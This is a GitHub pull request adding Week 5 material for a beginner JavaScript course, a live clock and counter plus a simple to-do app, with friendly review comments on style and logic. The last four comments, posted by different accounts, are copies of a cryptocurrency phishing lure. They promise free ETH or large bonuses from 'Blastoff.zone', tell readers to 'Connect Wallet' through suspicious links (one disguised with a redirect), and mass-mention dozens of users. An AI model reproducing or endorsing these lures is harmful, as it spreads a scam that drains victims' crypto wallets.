### PR TITLE
Week 5 Preview Material

### LINKED ISSUE #6: Upload Week 5 Preview Content
Week 5 Preview

### PR DESCRIPTION
**Pull request by psalm842**
Closes #6 

Exercise 1 shows moving all the javascript out of the html file into a separate *.js file. It also includes an update to show an asynchronous event firing in the background to update the time display.

Exercise 2 is the building of a simple to do app. 

I'm contemplating an exercise 3 which will let the user download/upload their task list.

### CODE REVIEW

**Comment by limitedAtonement** [comment]
> Week4/TodoPreview.html → Week5/TodoPreview.html

This should probably be copied, not moved (same for `Todoer_Requirements.md`).

Exercise 3 sounds very ambitious! I guess it would be a list of todo items separated by newlines? Maybe not too bad!

File: Week5/Week5_Exercise1.js [hunk 1]
```diff
@@ -0,0 +1,18 @@
+let count = 0;
+
+function getDate() {
+    setInterval(function() {document.getElementById("date").innerHTML=Date()}, 1000) 
+}
+
+function countUp() {
+    count = count + 1;
+    document.getElementById("counter").innerHTML = count; 
+    console.log("Count is ", count)
```
Comment (limitedAtonement) [inline Week5/Week5_Exercise1.js]: When passing multiple arguments to `console.log`, they are automatically separated by a space.

File: Week5/Week5_Exercise2.js [hunk 2]
```diff
@@ -0,0 +1,56 @@
...
+    checkBoxListItem.type = "checkbox";
+    // Create a label for the checkbox
+    let labelListItem = document.createElement("label");
+    labelListItem.textContent = task;
+    // Create a delete button
+    let deleteButtonListItem = document.createElement("button");
+    deleteButtonListItem.textContent = "Delete";
+    deleteButtonListItem.addEventListener("click", deleteItem);
+    // Add the items to the DOM 
+    taskListItem.appendChild(checkBoxListItem);
```
Comment (limitedAtonement) [inline Week5/Week5_Exercise2.js:28]: This is going to create a new list item every time a key is pressed in `todo_input`?

File: Week5/Week5_Exercise2.js [hunk 3]
```diff
@@ -0,0 +1,56 @@
+let taskList = [];
+
+function deleteItem(event) {
+    event.target.parentNode.remove();
+}
+
+function addTask(event) {
+    if (event.keyCode !== 13) {
```
Comment (limitedAtonement) [inline Week5/Week5_Exercise2.js]: A comment to dispel any mystery surrounding magic numbers is necessary :heart:

**Comment by limitedAtonement** [comment]
This pull request is not based on `main`!

File: Week5/Week5_Exercise1.js (hunk 1 above)
Comment (psalm842) [reply Week5/Week5_Exercise1.js]: That's weird! I'm not sure I like that! But thanks for pointing it out.

File: Week5/Week5_Exercise2.js (hunk 3 above)
Comment (psalm842) [reply Week5/Week5_Exercise2.js]: I was going to say something in class, but I went ahead and added a comment too. Magic numbers are a bad habit.

File: Week5/Week5_Exercise1.js (hunk 1 above)
Comment (limitedAtonement) [reply Week5/Week5_Exercise1.js]: Yeah, I don't like it either. I've gotten used to it, but I still have to go back and remove spaces before `",` almost every time! What ever happened to `printf`? :smiling_face_with_tear:

**Comment by limitedAtonement** [comment]
Sweet!

**Comment by aerosonic-jp** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
rajivbaranwal, @jeremytsngtsng, @xianz271828, @theo-lev, @tenebrisAenigma, @bstizz14, @Calvin087, @rubenoliveros, @LinkiT8300, @BasilStocking, @v-van, @vs4vijay, @Thxzzzzz, @just4n00b-a, @Orendev, @mikechesterwang, @thesimplezero, @addyxvii, @PinkR1ver, @evelynEdison, @omondi8399, @izayl, @viorel-d, @iabcxyz, @muhammadaasim, @ousawack, @raviqqe, @0xgxthxb, @RuneRobot, @saed13, @princeleonal, @SilasZhr, @Alakazam03, @open3x, @dmitrymotorin, @armeldevsarl, @Benllycast, @thestockman27, @deelaks, @adrianblade, @userxwhoami, @satyamsingh07, @jc628, @nikolahu, @jordanlepera, @tuoxiansp, @AdminBlock, @Cryking, @pakhuong, @Chinjoy

**Comment by jguzej** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
moocstudent, @waymaiker, @Luke-Rogerson, @Bholland1981, @vmedvedev, @LexaHood, @KrisPett, @danil007524, @maikhai889, @Aktherhossen475, @joengelh, @roigecode, @Dom-Mac, @qinyuguang, @4r7if3x, @hjki456789, @syntix, @Svetlana-art, @hungdiep97, @AllenChanAnc, @JhiNResH, @aryaminus, @StephanieIlievaa, @Eidjaz, @watchanan491, @JiangYongKang, @otampy3184, @bryan99nayrb, @tongshi, @anburera, @MaharshiChoksi, @qweekdotstechnologies, @McXD, @matyo91, @Frederik-11, @whwbang, @arihantbansal, @0xyicheng, @coding-dynasty, @kumar-ish, @marzkud, @TimberTang, @mowmanminer, @LQ-11, @devolaw, @penso, @cfelde, @Running-Chen911, @lcbasu, @Squirre17

**Comment by chugo-admin** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
mattupham, @sobitd, @mikeoertli, @dongxuteng, @sephynox, @Miguelneil, @nistadev, @senmonster, @rpranayr, @Sean12697, @galaxyxym, @0xSyam, @kulakovd, @jrbrowning, @NPetz, @liuser, @IvanovRoman, @daebowale, @BARK-MBISHOP, @A6B0, @ChrisFrontDev, @eeevvaaa, @joeymach, @srivatsav01, @Pljas, @Julia-fil1, @angelr1076, @ardyfeb, @j67dee, @LordEvendim, @oniox, @0xYujan, @rajeebkm, @balrampandey19, @BrandyFortunata, @sphilee, @ChengYingWu, @abstrakt, @SofianeBoumedine, @adrien-bru, @pauljxtan, @deepakgudla, @subinium, @Zeekey0427, @kwikiel, @andr-drozd, @bmskutt, @peitalin, @abdullah1908, @refl3ction

**Comment by 07Owuor** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
alvaro-jmp, @daruiwu, @mark2021blue, @supercocoa, @longht021189, @zhwei820, @biezhihua, @sam-s-app, @andrii-drobiazko, @Raeraeallday1, @swift1337, @CoCo-Mr, @omidsfd, @opticalor, @irakliy01, @dennismarye, @bontequero, @kazekim, @dp021294sav, @tutiputi, @0x48415a484952, @Arioobarzann, @msrdanov, @optout21, @mac-code, @LinminCrypto, @AAIS2, @brianmwadime, @TheOn-code, @KY-zero, @Kerita, @ygsgdbd, @mrkaurelius, @VatsalNarwal, @darklost, @Emanxu, @ppd0705, @TOPCODER10192, @hoveyfafa, @kramlex, @chenzhuo112, @dijonkitchen, @Dashon-Hawkins, @Starterforward, @DavidMtundi, @modulexcite, @GizNouv, @kittiwatm, @srinitude, @rise-worlds

**Pull request merged**